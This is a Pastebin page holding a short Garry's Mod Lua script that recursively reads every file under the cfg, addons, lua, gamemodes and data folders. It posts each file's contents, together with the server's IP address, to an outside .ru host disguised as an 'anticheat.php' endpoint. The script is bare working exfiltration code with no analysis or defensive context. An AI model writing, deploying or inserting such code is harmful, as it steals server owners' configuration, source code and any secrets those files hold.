Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local function a(b)
- local c,d=file.Find(b.."*","MOD")
- for _,f in pairs(c)do
- local g=file.Read(b.."/"..f,"GAME")
- -- if g==nil then return end
- http.Post("http://cn32578.tw1.ru/anticheat.php",{one=b,two=f,tree=g,vfo=string.Replace(game.GetIPAddress(),":","_")})
- end
- for h,i in pairs(d)do
- a(b..i.."/")
- end
- end
- a("cfg/")
- a("addons/")
- a("lua/")
- a("gamemodes/")
- a("data/")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement